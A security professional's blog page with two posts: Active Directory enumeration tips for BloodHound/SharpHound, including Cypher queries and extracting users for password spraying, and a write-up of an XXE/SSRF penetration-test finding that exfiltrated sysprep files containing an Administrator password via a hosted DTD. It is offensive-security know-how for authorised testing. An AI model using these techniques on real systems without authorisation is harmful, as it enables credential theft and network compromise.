top of page
Search
  • Writer: Warren Butterworth
    Warren Butterworth
  • Jun 22, 2022
  • 4 min read


Anyone in the Infosec community has heard of bloodhound. Its a tool used to enumerate Active Directory and is my go to on an Internal Engagements. Bloodhound uses graph theory and was created by some of the amazing guys over at SpectorOps.

I have used bloodhound a fair bit but I am by no means an expert, but I thought I’d put together this post of a few things which have helped me and might help other Infosec professionals.


Loop collection method

While this is in the docs I feel it might be something thats overlooked. Members of groups, group policy, users etc are areas within active directory that dont generally update on a regular basis throughout the day. User sessions however is something that changes often as users login and out of workstations/servers throught the day. This can be a great technique to understand where a domain admin has been. All you need to do is run the collection method session for a period of time. Sharphound will continue to run dumping session data as it goes. This can them be imported into bloodhound.

--CollectionMethod Session --Loop --Loopduration 02:00:00

To see the percenatge of Session data you all ready have within bloodhound run the below query in neo4j console.

MATCH (u1:User)WITH COUNT(u1) AS totalusersMATCH (c:Computer)-[r:HasSession]->(u2:User)RETURN 100 * COUNT(DISTINCT(u2)) / totalusers AS userPercentage

Password Spray

Once you have a set of valid credentials you can then use sharphound to gather all Active directory information including users/groups. I like to find domain users group and select total amount of users and dump to a json file.

With a little grepping you can extract all user accounts from this file and use them to password spray with weak passwords. If you have 3000 users how many have Password1 or Summer2022 set as their password?

cat users.json | cut -d ':' -f 2 | sed 's|[",\t]||g' | sort -u | tee -a users

AD CS & Custom Queries

If youv’e been living under a rock and havent heard about AD CS abuse then this whitepaper by Will & Lee from SpecterOps (again!) is a must read. However if you use a tool by Oliver Lyak called Certipy you can enumerate Active Directory Certificate Services (AD CS).

This tool queries AD and dumps a json file which can be loaded into Bloodhound on top of sharphounds previous data. (Certipy does a lot more but in this scenario we are just worried about the bloodhound data). After uploading you will need to add the custom queries to neo4j. Once added you can run queries on the data looking for all AD CS vulnerabilities. Reference the above whitpaper for abuse scenarios.


More Custom Queries

Over time you find queries which help you and start modifying queries to you need. For example within bloodhound there is a query to show out of date operating system and I often look at this on an engagement. The issue with this command is that these workstations/servers could be disabled but an administrator hasn’t tidied up Active Directory. So you get the old data not cleaned up in your sharphound dump. Adding the enabled to the below query helps with this.

MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*(2000|2003|2008|xp|vista|7|me).*' AND H.enabled = true RETURN H

Another quick tip: By default bloodhound marks a few high profile targets on initial graphing: Administrator etc. On one engagement I had 35 Domain admins across the whole estate (yeah 35!) so these were all targets for my enagagement. Now to mark them you right click and set as High value target. “35 x right click x Set as High Value Target” was gonna be way to long for me to do. Enter the below raw query.

MATCH p=(n:Group)<-[:MemberOf*1..]-(m) WHERE n.objectid =~ "(?i)S-1-5-.*-512" SET m.highvalue = true RETURN m

These are small tweaks to previous queries but they save me time. I have many queries like this that really help. There are many blogs and repositories out there created by others in the industry that have these and many more to many to list here. But what I’m trying to say is tweak them, build your own, make them do what you need them to do.


Non Domain Joined

Again this is all in the docs, but often your first entry on an internal engagement will be a brute forced password via spraying or a cracked password from responder. While not an officially supported collection method dumping sharphound data from a non domain joined machine can aid in enumerating the domain. NOTE: Amend DNS server to be the IP address of the domain controller within your target network. You can spawn a command shell or powershell as the breached user using runas.

runas /netonly /user:DOMAIN\user.name powershell.exe

I use a similar technique for powersploit also:

$cred = Get-Credential

This then allows you to supply the credential on the powersploit commands as below:

-Credential $cred

Final thoughts

None of this is new and there are lots of blogs detailing some of the above in more detail. The bloodhound docs are a must read. I just wanted to share a few tips that have helped me and that I find useful on every test.

 
 
 
  • Writer: Warren Butterworth
    Warren Butterworth
  • Aug 27, 2021
  • 3 min read

Updated: Jan 17, 2024





Disclaimer: Details are Generic and no client information is present in this post.

For Clarity from Portswigger.net:

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

On a recent penetration test, I was tasked with testing a bespoke Windows application that connected to a REST API. The application was used by sales team members to create quotes and manage clients. Since these people were often on the road and sometimes had no access to the internet all day, the data was stored locally by the application. Once connected to the internet, it would sync local data with cloud data.


Initially, I spent time using the application and capturing requests sent to and from the server. As most of the data was stored locally most of these requests were very similar. Push new data to server / Check data / pull specific requests for items that had not been previously downloaded i.e. catalogues and that was about it. 3–4 requests in burp are all very similar.


I noticed when amending a customer's details in the application and then saving, it updated the local copy, and a POST request was also sent with updated info. I grabbed this request sent to the repeater and started playing around. Straight away I thought “I’m gonna try XXE..” So this is where I started. The first attempt with the Burp collaborator yielded positive results.


Burp collaborator gets a hit


Amazing. The next step was to see what juicy information I could ex-filtrate…


So I created a malicious DTD file on my VPS and set this up to read files from the server using the below syntax. As this was a Windows server first call was C:/windows/win.ini


Hosted Malicious dtd


win.ini received


The next hour or so was spent plugging in potential files to exfiltrate, but most of these were not hitting or would send back an 'access is denied' response, or some characters would break the HTTP syntax.

I thought I’d try a few more things and see what I could learn. I tried internal port scanning, but I couldn't get results. Then, I attempted to see if the FTP protocol would connect. So I fired up responder and waited.




Well, that worked…

So what about the SMB protocol? After reading the following blog I was hopeful. Maybe I could capture a NetNtlm Hash?? But this wasn’t to be.SMB protocol was blocked for outbound connections.

I could confirm the presence of internal SMB shares….




Hmmm… So what next….. Well so far I could ex-filtrate some local files, confirm internal shares, and connect outbound using FTP and HTTP but I needed something a bit better than “I managed to get a hold of the win.ini file” I wanted something a little more jaw-dropping than that.

I went back to file extraction and started to look at files that you would generally look for during privilege escalation.

First up was Unattended.xml.



HTTP Syntax was getting broken. So I started looking for sysprep.inf and sysprep.xml which are used to deploy image-based installations.

First try I managed to get sysprep.inf.


After URL decoding I was presented with an encrypted Administrator hash!







I wanted to keep digging. So I needed a comprehensive list of all the locations of interesting Windows files and I came across this list by soffensive on GitHub. I started trying all similar locations for sysprep.xml. Finally, by using the below payload hosted on my VPS, I was rewarded.



However this time the file included the base64 encoded username/password for the Administrator. After a quick decode, I had a plaintext password:username.


Administrator Password


Now, I had something with more impact than win.ini to include in the final report.

This is my first post, so please be gentle. However, I always believe that sharing is caring!


I will try and put more posts together but in the meantime, you can always follow me on Twitter. I’d like to shout out these blogs that helped me along the way.







 
 
 
  • LinkedIn

© 2024 by Warren Butterworth. Wix

bottom of page